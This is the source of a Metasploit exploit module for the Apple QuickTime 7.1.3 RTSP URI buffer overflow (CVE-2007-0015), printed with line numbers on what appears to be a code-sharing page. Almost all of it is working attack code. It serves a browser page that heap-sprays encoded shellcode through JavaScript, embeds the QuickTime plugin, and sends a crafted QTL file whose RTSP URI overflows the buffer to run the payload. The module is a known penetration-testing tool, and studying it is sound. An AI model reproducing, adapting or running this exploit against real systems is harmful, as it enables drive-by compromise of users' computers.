Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #include Msf::Exploit::Remote::BrowserAutopwn
12
  #autopwn_info({
13
  #  :os_name => OperatingSystems::Match::WINDOWS,
14
  #  # No particular browser.  Works on at least IE6 and Firefox 1.5.0.3
15
  #  :javascript => true,
16
  #  :rank       => NormalRanking, # reliable memory corruption
17
  #  :vuln_test  => nil,
18
  #})
19

20
  def initialize(info = {})
21
    super(update_info(info,
22
      'Name'           => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
23
      'Description'    => %q{
24
          This module exploits a buffer overflow in Apple QuickTime
25
        7.1.3. This module was inspired by MOAB-01-01-2007.  The
26
        Browser target for this module was tested against IE 6 and
27
        Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the
28
        QuickTime plugin.
29
      },
30
      'Author'         => [ 'MC', 'egypt' ],
31
      'License'        => MSF_LICENSE,
32
      'References'     =>
33
        [
34
          [ 'CVE', '2007-0015' ],
35
          [ 'OSVDB', '31023'],
36
          [ 'BID', '21829' ]
37
        ],
38
      'DefaultOptions' =>
39
        {
40
          'EXITFUNC' => 'process',
41
        },
42
      'Payload'        =>
43
        {
44
          'Space'    => 500,
45
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
46
        },
47
      'Platform' => 'win',
48
      'Targets'  =>
49
        [
50
          [ 'Automatic', { } ],
51
          [ 'Apple QuickTime Player 7.1.3',
52
            {
53
              'Ret' => 0x6855d8a2  # xpsp2/2k3 :( | vista ;)
54
            }
55
          ],
56
          [ 'Browser Universal',
57
            {
58
              'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
59
            }
60
          ],
61
        ],
62
      'Privileged'     => false,
63
      'DisclosureDate' => '2007-01-01',
64
      'DefaultTarget'  => 0))
65
  end
66

67
  def on_request_uri(client, request)
68

69
    return if ((p = regenerate_payload(client)) == nil)
70

71
    if (target.name =~ /Automatic/)
72
      if (request['User-Agent'] =~ /QuickTime/i)
73
        target = targets[1]
74
      else
75
        target = targets[2]
76
      end
77
    end
78

79
    cruft  =  rand_text_alphanumeric(4)
80
    # This is all basically filler on the browser target because we can't
81
    # expect the SEH to be in a reliable place across multiple browsers.
82
    # Heap spray ftw.
83
    sploit =  rand_text_english(307)
84
    sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
85
    sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
86

87
    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
88
      print_status("Sending exploit QTL file (target: #{target.name})")
89
      content = build_qtl(sploit)
90
    else
91
      print_status("Sending init HTML")
92

93
      shellcode = Rex::Text.to_unescape(p.encoded)
94
      url =  ((datastore['SSL']) ? "https://" : "http://")
95
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
96
      url << ":" + datastore['SRVPORT'].to_s
97
      url << get_resource
98
      js = <<-ENDJS
99
          #{js_heap_spray}
100
          sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
101
        ENDJS
102
      content =  "<html><body><script><!--\n#{js}//--></script>"
103
      content << <<-ENDEMBED
104
          <OBJECT
105
          CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
106
          WIDTH="1"
107
          HEIGHT="1"
108
          CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
109
          <PARAM name="SRC"        VALUE = "#{url}/#{cruft}.qtl">
110
          <PARAM name="QTSRC"      VALUE = "#{url}/#{cruft}.qtl">
111
          <PARAM name="AUTOPLAY"   VALUE = "true"               >
112
          <PARAM name="TYPE"       VALUE = "video/quicktime"    >
113
          <PARAM name="TARGET"     VALUE = "myself"             >
114
          <EMBED
115
            SRC        = "#{url}/#{cruft}.qtl"
116
            QTSRC      = "#{url}/#{cruft}.qtl"
117
            TARGET     = "myself"
118
            WIDTH      = "1"
119
            HEIGHT     = "1"
120
            AUTOPLAY   = "true"
121
            PLUGIN     = "quicktimeplugin"
122
            TYPE       = "video/quicktime"
123
            CACHE      = "false"
124
            PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
125
          </EMBED>
126
          </OBJECT>
127
        ENDEMBED
128
      content << "</body></html>"
129
    end
130

131
    send_response(client, content, { 'Content-Type' => "text/html" })
132

133
    # Handle the payload
134
    handler(client)
135
  end
136

137
  def build_qtl(overflow)
138
    cruft  =  rand_text_english(4)
139

140
    content =  "<?xml version=\"1.0\"?>\n"
141
    content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
142
    content << "<embed autoplay=\"true\" \n"
143
    content << "moviename=\"#{cruft}\" \n"
144
    content << "qtnext=\"#{cruft}\" \n"
145
    content << "type=\"video/quicktime\" \n"
146
    content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"
147

148
  end
149
end
150

151